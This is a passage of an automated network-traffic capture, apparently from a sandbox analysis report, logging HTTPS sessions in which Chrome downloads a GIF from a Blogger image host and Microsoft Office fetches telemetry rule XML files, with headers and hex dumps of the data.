                                                                                                                            Data Ascii: r0yp^'Z^680p<=pr`aQEc]TJwS;7k'AD)oFzh6`R[p+C>[P*`[%'k+'1KE<`ZBJXJdq_oC<=mM@D@Ea'`N+RVG\n{0^;
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 16 29 80 3e 50 30 92 2d 5f a7 6c 8f c2 24 7b b8 e5 ff cb 06 12 4a 42 78 80 d2 e9 c9 08 bc 7b 0b 3f da f4 a9 da b5 2a 9d 02 45 09 74 c2 d8 97 14 1e 28 4f 1b 5c c2 03 06 19 18 4c 1f cb 57 02 86 0c 2f 41 22 67 5c de fc f9 e7 8e d1 af 67 df de fd dc bc 70 0f bf a7 5f ff 70 ce 92 16 12 6c d0 00 04 0e 24 4c 22 fa 84 b3 4f 3a 81 28 b4 85 36 b1 24 b3 4e 2c e9 22 08 0b 30 d8 c0 02 09 14 b0 ad a5 d8 d6 1a 8a b6 0b 59 d2 89 a8 94 b4 4a 6a 44 12 4b 4c aa 2d e5 1c 60 60 44 90 c8 0a 4f ab b6 50 d2 2a 3b 99 58 22 eb 2d 94 64 ac 6f 47 f3 e2 7b 6b 3e 1e 83 14 72 48 f8 5c fb 51 3d 22 93 34 6c 2f 93 f4 b3 60 03 c9 30 48 42 0e 4a 02 b4 c8 21 8c 2a e2 a4 b4 01 35 59 43 8a 10 4e c0 c0 02 08 a0 ea f0 3a f2 26 d8 f0 b9 da 6c 54 4f 46 90 20 30 71 ce 12 41 4a 6e 39 12 5b 1c 2b 3c
                                                                                                                            Data Ascii: )>P0-_l${JBx{?*Et(O\LW/A"g\gp_pl$L"O:(6$N,"0YJjDKL-``DOP*;X"-doG{k>rH\Q="4l/`0HBJ!*5YCN:&lTOF 0qAJn9[+<
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 73 b1 e5 5c eb 52 d4 b1 87 04 52 6f 97 ba dd ec 36 ae bb 91 0d 2f 60 a6 bb db ea 16 e6 bc e5 35 d4 7a d9 db 46 5e f6 d1 bd be a5 e3 7b a5 36 df e0 62 77 8a f8 dd e5 3b ed 5b da 31 c6 f7 bf 88 8a 2e 1e 89 cb 53 1f ea 16 af 21 3b f0 80 e7 57 60 06 ab 35 bf a6 35 21 64 3d 1b 5f 0b 9b 77 9c 12 76 b0 e3 28 ec df 0c 77 98 ba a2 e5 70 fe ec 4a de 05 cb 15 b0 22 76 d4 89 59 3c 62 0c 2f d6 bb fe 73 b1 86 7f 2b 63 14 bf f8 3d 35 76 70 5b 67 6c e2 0d 33 36 c0 fe fd 6b 89 75 1c 56 08 ab d8 c8 a4 ff 55 a7 6c c5 79 63 d0 7e 17 ca a3 3d 32 7a 9a fc da ff 42 b5 c1 48 ad af 82 2f 28 e0 83 56 f9 c1 43 f6 db 96 59 cc 5f 20 a7 97 30 68 16 33 63 d8 5c de 37 fb 51 a8 6b 9e 73 9b 75 5a 67 3b f7 57 ba 78 2e 62 7d f3 7c a8 38 63 eb 57 83 26 74 a1 0d 7d 68 44 27 5a d1 8b fe d5 61
                                                                                                                            Data Ascii: s\RRo6/`5zF^{6bw;[1.S!;W`55!d=_wv(wpJ"vY<b/s+c=5vp[gl36kuVUlyc~=2zBH/(VCY_ 0h3c\7QksuZg;Wx.b}|8cW&t}hD'Za
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: eb 4c 8e 0b b9 cc 3c c0 07 1c b4 93 c4 b4 d2 4c 39 8f 1c 4d d6 f4 3f d0 cc 91 ce 94 47 d5 14 cd d6 ac 21 f9 11 c3 b1 54 48 30 ac 0b c4 4b 4c bc dc 4d 73 13 4c ff 78 82 c2 63 e4 cb b4 04 c2 ce cb 47 10 83 cb e7 8a c5 34 13 4a af 3c cb 35 4a 45 f5 03 4a 7e ec 44 53 94 ce e8 d4 ba a8 ac 9c a9 d4 4e 2f 2c 4a ea a4 40 ec c4 45 f0 84 45 9e ac 32 e7 c4 9f ef 3c cf f5 6c bd f2 7c 4c 57 c4 bf f9 3c cf dc b3 ca 77 0b cb c5 84 be b9 b3 37 b3 94 4e fd b4 4b f8 6c 37 c2 dc 1a 1e 33 cf 84 f3 4b 11 34 b8 c0 1c cf 82 d4 4b dd 7c 48 18 fb 42 09 ed 3e dc 1c 46 e1 b4 3c e2 b4 3b 5f 3c ce 02 d5 c4 0c 2d c6 ec 5a c2 d9 db d0 af 64 42 c9 3c 42 05 15 4f a7 1c 42 24 6c b3 86 5b 51 ef 64 50 6b 4c a0 cb 1c ca 18 45 4e c6 6c a8 fd ec 9d 7f 94 cc cf 9b 3f ba f4 3d e6 a4 b7 c0 33 a9
                                                                                                                            Data Ascii: L<L9M?G!TH0KLMsLxcG4J<5JEJ~DSN/,J@EE2<l|LW<w7NKl73K4K|HB>F<;_<-ZdB<BOB$l[QdPkLENl?=3
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 69 9d de 69 9e d6 43 96 a6 80 42 b4 e7 9e 1e 6a 66 06 30 81 cd 63 92 36 dd 2a 95 d3 9e 14 69 58 06 65 7f ce 60 cd dd 60 a6 96 a9 4f 4e 6a 4b dc e4 5c b6 e1 52 36 d8 92 be e5 f7 ed cf 34 5e cb da 25 e6 19 de d5 81 d6 60 15 4b 6b 0c f4 dd 2f 3e ce 7e 2d 4b ae 06 d0 85 15 cb 62 c6 e2 63 26 99 2d 8e ea 5b c6 e7 ca 35 d5 57 46 55 81 06 68 c1 45 c1 7e 9e d0 08 25 ec 1c d4 e7 3f bb 10 6e f4 eb 16 83 e7 c9 49 e2 b7 6c e7 b1 06 4b db 78 ec cb 16 ac 97 0e 6c 38 d6 d2 9a ce 4e b9 fc d5 c5 36 44 11 d5 9a 89 4e 09 fd 4d ed 41 db 57 4a 73 6d d6 8e ed fe 5d 6d 7c f5 3b c8 b6 98 17 56 64 d0 66 dc dc be 52 ff 90 36 ba ab c6 d6 5b d4 6a b2 ee 68 56 0c 6e a9 be e9 2a c6 ea b3 3e 8f 93 be 4a a7 76 db df be dd c8 8d ee f1 ad ea fc 29 68 e9 25 b4 35 9d 47 8c fe e6 8f 3b 8e 4b
                                                                                                                            Data Ascii: iiCBjf0c6*iXe``ONjK\R64^%`Kk/>~-Kbc&-[5WFUhE~%?nIlKxl8N6DNMAWJsm]m|;VdfR6[jhVn*>Jv)h%5G;K
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 40 0d 62 a8 21 88 13 71 38 81 87 0e 99 58 41 88 00 0e 77 e1 89 0e d5 17 20 4a 2d a6 38 63 67 23 96 28 23 8d 39 a2 b6 a2 41 29 41 a4 63 46 b7 f9 f8 20 47 42 3e f4 23 90 49 76 66 a4 4a 4a 3a 79 95 85 02 39 18 98 93 b6 c1 f8 61 47 1e 52 58 25 97 eb 41 49 d0 94 5d 22 68 ff e3 95 2d a2 28 e6 7e 3c 0e 14 e3 89 2f aa 29 65 43 38 a2 39 e7 46 64 be 39 01 9b 26 d2 99 e2 8d 6d ee 49 62 99 72 16 19 a8 9f 7f 1a aa a2 49 60 c6 59 e8 a1 cb d9 99 e8 85 4d fe 79 db 96 59 06 08 a7 a4 8d 6a 2a d0 a3 51 46 8a e4 a6 c5 75 2a 41 a8 3b 42 aa d9 9d a5 aa ba db 48 56 a6 ba 6a 86 07 d2 29 eb 46 b4 c2 5a aa ad b7 ae 36 aa ae 0c 5e 4a 57 ae bd 3a c9 ab b0 f3 11 db 6b b0 17 25 5b ac 8e c7 32 eb 68 ab bd fd 8a eb b4 c2 9d fa 6c a3 ce 62 4b 9c b6 b0 2e 5b d1 b7 db 82 d8 ad b8 f3 51 fa
                                                                                                                            Data Ascii: @b!q8XAw J-8cg#(#9A)AcF GB>#IvfJJ:y9aGRX%AI]"h-(~</)eC89Fd9&mIbrI`YMyYj*QFu*A;BHVj)FZ6^JW:k%[2hlbK.[Q


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            79192.168.2.649818142.250.185.1934436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:14 UTC669OUTGET /img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).gif HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:15 UTC480INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/gif
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v73c"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:15 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="ezgif.com-crop (4).gif"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:15 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 1382333
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:15 UTC910INData Raw: 47 49 46 38 39 61 58 02 b3 03 f7 00 00 00 4c b7 00 7d f6 00 ff 00 01 22 52 02 35 81 02 7d da 02 87 ee 03 58 d1 03 82 e1 03 a0 fb 04 19 39 04 1b 41 05 18 36 05 67 b2 05 8d f2 06 91 f7 07 9a e0 08 8a ec 09 ab fd 0b 89 e5 0b 95 f8 0c 8b eb 0c 8c eb 0c 8d ed 0c 8e e8 0d 8b e8 0d 8c e8 0d 8d e9 0d 90 f1 0e 8b e8 0e 8c e7 0f 8b e9 0f 8c e9 0f 8d e6 10 52 b8 10 82 d7 10 87 de 10 8a e3 10 8b e5 10 8b e7 11 79 cf 11 8a e4 13 8e e9 14 8a e5 17 89 dc 18 20 2f 19 85 d9 1a 22 2e 1b 8f e3 1d 7b c4 1e 5f 92 1e 93 ea 1e 9e fb 20 2b 36 20 6d a5 20 78 c9 20 7e c7 21 81 ca 22 96 ec 24 6e d5 25 84 ca 26 89 d3 27 98 ea 29 31 37 2a 2f 76 2c 9a ed 2f 7d b8 31 92 d7 34 36 3a 34 50 67 37 7a ab 37 94 c9 37 9f ed 38 48 54 39 ab fc 3c b7 fe 3f a3 ee 40 5d 73 42 a6 f0 43 9d e1 44 a3
                                                                                                                            Data Ascii: GIF89aXL}"R5}X9A6gRy /".{_ +6 m x ~!"$n%&')17*/v,/}146:4Pg7z778HT9<?@]sBCD
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 30 63 b6 fc 40 b3 a6 4d 9b 32 73 36 bc 79 42 a7 cf 81 3c 7f ae bc a0 e2 42 05 a1 48 93 2a 5d ca 32 a2 d3 a7 10 3d 82 14 49 b5 aa d5 ab 58 b1 86 d8 ca 95 a9 d7 af 60 c3 2e ac 79 02 67 41 0b 20 2e 58 58 8b d6 20 d7 ae 4c 79 d2 24 88 16 aa 58 81 72 3f dc 1d 78 21 ed d7 b7 7b 03 0b 2e 08 15 2a 45 a9 1f 13 23 5e ac b8 31 e3 a9 59 3f be 0d 31 b8 b2 e5 cb 0a 3f 94 2d ab f7 2c db cf 6e 27 7b 25 ab d9 60 dd a7 7b 49 f7 c4 bc 74 32 5c d6 b0 7f 16 7e 4a 31 b2 ed db b8 5d c7 de cd fb eb cd ce a6 d9 22 d4 1d d7 e6 ea b6 20 4e 3b 4d 6d bc 37 52 c0 ce a3 b7 9c ed f4 70 62 dc d8 b3 13 97 ce bd fb 4e 9a 9c e7 1e ff 04 7d 70 bb d2 bc 74 41 d8 bd 8b de fb 4b e8 ee e3 13 a6 0e 31 e4 63 c7 f8 ef eb cf 2f 19 be fc ff dd fd 26 5e 70 6b 0d 27 5a 71 e0 71 86 1c 5a 14 2d c7 9e 71
                                                                                                                            Data Ascii: 0c@M2s6yB<BH*]2=IX`.ygA .XX Ly$Xr?x!{.*E#^1Y?1?-,n'{%`{It2\~J1]" N;Mm7RpbN}ptAK1c/&^pk'ZqqZ-q
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: b9 d1 8e 62 91 99 26 8c 85 2b 58 21 0b 68 4a 73 06 de 2a a3 f6 1a b7 32 15 68 72 ab c3 ba 59 10 6b b9 32 ed a9 60 06 85 55 27 ae 66 26 3b 93 a1 8c 2b 25 08 c1 3d 65 39 81 ce 86 40 5d 02 f9 d5 bf 06 b2 01 94 81 20 04 1b a0 ea 50 29 85 26 d2 fa ec 77 17 6b 9b 5a f7 85 12 18 ff c0 60 08 79 b0 5f 2b 5c d1 8a 58 d4 e2 b7 cb 14 e9 31 87 4b dc 63 a2 70 a4 2a 84 a6 2b e8 20 04 d9 19 6e 05 26 58 9a 1b 2d f0 01 9b 66 80 3c 47 b9 e5 4d 64 b7 02 03 36 ae 26 92 83 d9 e2 d4 a9 ce a3 35 ed bc 18 88 40 48 2e d0 4e c5 09 91 26 11 8c 08 d3 54 e0 20 3c 42 cc 82 04 59 23 e6 62 4b b4 d9 b6 aa 03 6c 9d 80 1e 2e a1 c2 fb 45 72 91 8f 84 85 71 79 3b dc fb d9 ef c1 0e 4e 45 2a 56 28 8b 49 a4 01 06 2b 00 66 49 3e 00 60 15 38 c0 00 c0 0c 31 30 29 6a b5 0b 88 96 2c 26 21 c8 60 49 80
                                                                                                                            Data Ascii: b&+X!hJs*2hrYk2`U'f&;+%=e9@] P)&wkZ`y_+\X1Kcp*+ n&X-f<GMd6&5@H.N&T <BY#bKl.Erqy;NE*V(I+fI>`810)j,&!`I
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: d0 05 2f 27 3d a5 70 93 23 e0 02 2c a0 03 8e 00 0a b4 f0 0a aa 90 08 5a 73 53 1c c6 1e 25 a7 4b e6 b8 95 59 c2 53 82 c7 02 6d 90 09 a0 20 6d d4 f3 8e cd 15 02 42 30 04 46 20 04 3c c0 03 d7 c1 8f 30 90 32 2b 23 77 1c e0 03 79 30 52 f6 33 81 ac b0 7d ab 84 89 be 27 0b 7a 80 05 10 00 01 0f c0 01 23 c0 02 78 d0 93 a0 20 08 24 90 02 54 e1 00 11 80 07 93 00 4d 25 c8 03 37 50 98 da 53 05 83 70 0b bb 55 0a 41 90 03 a9 a5 3d d9 14 7d 8b e7 07 3d d0 03 72 f3 00 01 50 05 84 20 81 ae 30 0a 3e 10 94 15 d0 4d 1f 66 07 04 46 0b 25 38 91 2c a5 9a 9a 69 0b b3 e0 87 50 90 03 17 e0 00 2e c3 1c b3 c6 95 6f e3 5f 8c c2 53 2c 50 35 3c 90 07 d0 43 0b c2 05 4d 7a 20 05 39 86 67 33 20 5d 4b b3 7c 99 25 97 2a 43 14 ea f6 88 51 ff 67 42 b6 40 42 76 60 04 47 43 13 b0 63 09 aa 00 4d
                                                                                                                            Data Ascii: /'=p#,ZsS%KYSm mB0F <02+#wy0R3}'z#x $TM%7PSpUA=}=rP 0>MfF%8,iP.o_S,P5<CMz 9g3 ]K|%*CQgB@Bv`GCcM
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 8c 3c b7 a9 18 c9 58 99 b7 34 53 c9 e8 8c 24 44 2a 36 62 97 65 9e bc c4 3d b5 02 4c 07 bf f0 ab bb 01 c0 91 7f 93 cf 34 a0 9a 76 29 cc 2a 44 c7 a5 60 83 fd fb 01 eb 39 6c 81 09 3b 1c 40 03 68 40 7f 2c b8 08 6b 80 bb 9e 26 12 00 2a 42 fe 43 61 0f 58 60 ac 80 cc 2d 05 02 82 d6 c1 48 07 06 72 53 37 b5 14 cd 94 30 cd c7 bb 85 19 56 c8 14 b6 42 d0 04 cc c4 16 ce 42 50 af b1 24 c9 75 ff 92 ce 36 cd 24 68 d4 01 2a a0 04 cb b3 45 23 58 75 46 e8 ac 59 83 61 34 51 ae c1 44 03 67 40 07 79 40 08 b7 cc d4 68 70 06 2e 97 0b b1 a0 42 89 84 0a 9a 90 88 d9 14 bf cf 9a 7e 90 50 08 79 80 07 78 70 cb 71 35 61 a7 c0 06 42 20 46 4a 88 01 10 80 01 00 0a 7c c3 c8 07 76 00 d7 76 60 07 7a 10 08 a6 b0 b0 e7 19 02 1b bd 34 1d ac c7 20 fc 00 75 b3 34 24 3d cd 1c ba 85 84 8c cd b2 b0
                                                                                                                            Data Ascii: <X4S$D*6be=L4v)*D`9l;@h@,k&*BCaX`-HrS70VBBP$u6$h*E#XuFYa4QDg@y@hp.B~Pyxpq5aB FJ|vv`z4 u4$=
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: d3 b1 62 a1 56 ad fa b4 ab 59 b3 64 c9 b2 e5 e8 08 ff 8f 10 18 42 94 60 51 42 67 08 15 24 48 14 95 88 b2 a9 ce 94 8b 2d e6 2e e1 72 45 09 0c d1 43 98 48 91 55 b3 4e 15 12 53 9a d0 99 02 c6 45 ea 2c 76 9e a8 50 e1 84 8a 9c d0 4b 1a 27 fa dc 43 f4 0d c5 cf af c7 be 1e ab 8a ef 25 40 9c e5 d9 bf 2f 4f cb 0e 03 10 b0 0c 32 d0 e0 40 04 03 54 70 41 06 19 e4 8a 31 c7 1a 6b 70 a4 bd 2a b4 f0 42 bb f2 ca 0b 43 0e 3b f4 b0 c2 0b 62 0a 29 80 3a 28 99 cd 95 54 4a 13 0d 34 d1 56 04 2d 34 57 40 ab a5 16 d1 62 81 f1 15 59 20 59 43 a7 e8 4a f0 91 37 16 bc 8a e0 02 c5 20 9a a0 a8 b2 40 d0 20 37 0e b2 2b e9 82 08 76 db 0d 03 07 20 c0 40 a2 9f 54 b8 40 05 0b 04 32 21 af e8 3c 80 49 05 9e 18 82 68 05 15 4a 80 20 04 0d 10 2a 6a 05 13 3c c0 6a 03 99 9e 22 ca 05 f1 d6 93 e8 a2
                                                                                                                            Data Ascii: bVYdB`QBg$H-.rECHUNSE,vPK'C%@/O2@TpA1kp*BC;b):(TJ4V-4W@bY YCJ7 @ 7+v @T@2!<IhJ *j<j"
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 72 ad 7b dd f9 f5 e4 4b cf a5 64 74 4d ea af ea 62 57 bc e3 e5 5a 55 fb c3 d5 da 16 f7 b6 bc e5 17 72 c9 fb de 0c 8d f5 ba 1b da cb 4f e9 45 dc 91 1a 17 9e 73 cd ea 6a 53 6b 5a ec 4a 56 bc 7e b5 2e 7d 27 fa 5d da 02 18 9f 9a 45 6f 61 1b e5 de 04 73 ef bd 02 0e b0 7c 0b 4c e1 76 de 56 86 f8 05 a9 7e 1b 2c 61 ba 6a 38 b1 0e be 30 81 2b 8c e1 de 9a 98 2e 5a f9 f0 63 17 cc d9 0f 57 2a b0 89 e2 ef 7c 3d 3a 61 0b 2f 37 c7 72 d1 2f 87 39 ea 61 c7 2a f6 c1 fe 1d 31 88 4f bc e3 12 1b b8 c4 15 ff aa 6b 90 15 cc 4e 20 97 d6 c8 43 6e 72 8c e1 8b 62 f8 66 19 2c 2a ee 6d 94 55 5b 65 2d 87 59 cc 7b e1 f2 6b bd ac 5b e9 8e 39 cb 34 7d 2f 4d d7 f9 16 c7 5c a4 71 c9 65 f0 d7 58 b7 66 9c aa 59 cf 73 29 b3 6b cf 4c 5d 22 ef 59 d0 83 c6 0b 92 cd bc 5e d6 52 77 b7 89 26 74 a3
                                                                                                                            Data Ascii: r{KdtMbWZUrOEsjSkZJV~.}']Eoas|LvV~,aj80+.ZcW*|=:a/7r/9a*1OkN Cnrbf,*mU[e-Y{k[94}/M\qeXfYs)kL]"Y^Rw&t
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 8c 90 ce 04 4c cb 03 0c 0f 0c 4d 0d 4c c6 c1 28 3e 0c d4 3c 0a fc 8b 03 29 3e d3 fc bc cf 2c 4d 10 a4 ca 83 9b 49 0e 81 30 db dc 4d af c2 4d 2f ac 2a de 0c 4e ff 81 83 41 a6 7c 49 e1 3c 4e 28 2b 4a bd 03 4e e4 6c ce fc 22 ce e5 34 4e e7 9c ce 88 83 4e 1e 94 47 ea cc 4e e0 b2 4e 21 5c 4a ed 0c 29 c4 7c c8 45 24 44 c7 ac af ae b4 4c ec 83 4c f5 24 2f ad cc 44 35 0c ca cc 7c c8 b0 5c c7 f0 3c 4c c3 bc c4 b2 2c c7 dc 54 48 fd f4 c3 f5 4c c9 f1 34 c1 f8 9c 0b 78 34 ba 0f 89 4d c4 78 cb 48 41 50 d9 e4 40 05 5c 50 06 25 be 0c 48 cd 09 f5 0b bd ac 50 d9 eb 4b 08 8c d0 cd 4b c0 e5 5b 8e 05 fc 40 c2 bc ca fa 14 cb 12 e5 ab f6 d4 3f 93 5c cc 36 8c cc ef 64 45 e5 bc ce b4 7b 51 1a 95 23 df ac 9f 21 ac 51 1d 95 9f a8 a4 c8 5d dc 51 20 8d 9d 1e 15 3f ef 0c 52 23 c5 a1
                                                                                                                            Data Ascii: LML(><)>,MI0MM/*NA|I<N(+JNl"4NNGNN!\J)|E$DLL$/D5|\<L,THL4x4MxHAP@\P%HPKK[@?\6dE{Q#!Q]Q ?R#
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 69 9d 2e 61 27 ad 5e 97 9e 2c 89 8e 69 99 06 e9 5c be 68 a3 b6 e8 78 e6 e9 f0 c5 e4 1b c2 a0 cb e8 8a a1 8e ea 4f 06 68 f1 a2 b5 66 d6 5d 10 36 b3 0e e8 0f cd 90 ea 83 16 ea a7 21 d9 78 0d 5e 8c 1c 67 58 96 e6 05 a3 3d af 96 e9 98 3e 1d b1 be df 79 35 6b f2 31 5a 24 ee 60 23 3e 62 07 55 e6 b5 1e ea 26 39 9d bb 46 be d6 84 e0 c3 dd d0 bf ae 0c 0d 16 cc 09 f9 e0 72 db ea bd fe 68 b0 76 2b 42 93 67 d0 c5 c7 60 de 64 b4 4e 4e 83 6e ec 8f 0e eb b7 fe 5f 6f 46 44 01 3e 5a a5 5d e0 c2 8e 0c 16 7b 8a c7 d1 ec 7b 7e 6c a7 36 8c 63 0d 0c af 85 6d 61 a5 50 d8 0c be d7 fe cb c0 8e ed d2 36 6d 1e c6 61 ff d2 56 e2 e6 ac 23 d5 fe ea 5b 86 6c b8 50 30 17 43 ee 61 fb ec e3 7a e8 9f 86 4a a8 56 01 a1 1e 6e 64 ee 6b e3 be 97 e5 5e 3b e5 4e ee 5f a6 52 9f 7e 6e a3 2a a9 cc
                                                                                                                            Data Ascii: i.a'^,i\hxOhf]6!x^gX=>y5k1Z$`#>bU&9Frhv+Bg`dNNn_oFD>Z]{{~l6cmaP6maV#[lP0CazJVndk^;N_R~n*
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 86 81 f9 d5 a1 87 66 81 e8 10 85 ff 59 38 e2 59 cb 31 94 20 8a 0c 89 b8 d2 7e 31 ca 38 23 8d 35 da 78 23 8e 39 ea 78 63 75 34 7a f0 a3 07 28 ed 38 24 91 45 1a 79 24 92 fb f5 38 63 7f 4d 9a 40 63 06 19 68 30 a5 06 51 26 79 25 96 59 6a b9 25 97 33 96 78 02 94 52 52 39 ff 65 97 65 9a 59 e6 92 32 fe 08 d3 8f 5c 8a 07 61 8b 09 f5 47 e1 89 71 6e a5 e2 86 17 da 89 d0 8b 7b 82 00 67 9c fb cd 59 e1 8a 9e f9 39 95 86 45 e9 75 e8 41 7d 32 fa a8 72 5f 95 08 69 86 a2 cd 46 29 a6 99 46 c4 dd 81 9a 42 f7 5b 7c 9e 8a 9a a9 71 9d 8e ca d8 4d a7 aa ea 29 7d ab 3a d5 aa ab b1 1e 5a aa ac ac fd 56 2b ae 71 72 9a 2b 50 89 f2 fa 2b 81 e6 05 08 6c 6c 96 86 4a 2c 86 80 b6 38 e1 a4 85 72 88 ac 6f ad e5 c9 28 83 d4 2e 05 a9 93 fd d5 09 6d 45 78 2a fa 58 9c d5 1e aa 2c 8a cc d2 e9
                                                                                                                            Data Ascii: fY8Y1 ~18#5x#9xcu4z(8$Ey$8cM@ch0Q&y%Yj%3xRR9eeY2\aGqn{gY9EuA}2r_iF)FB[|qM)}:ZV+qr+P+llJ,8ro(.mEx*X,


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            80192.168.2.64981913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:15 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:15 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:15 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 420
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                            x-ms-request-id: 10df1352-f01e-00aa-105a-178521000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115015Z-1657d5bbd48dfrdj7px744zp8s00000001m000000000eps0
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:15 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            81192.168.2.64982013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:15 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:15 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:15 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                            x-ms-request-id: b27116a7-a01e-003d-3a00-1798d7000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115015Z-1657d5bbd48xdq5dkwwugdpzr000000002bg0000000006bv
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
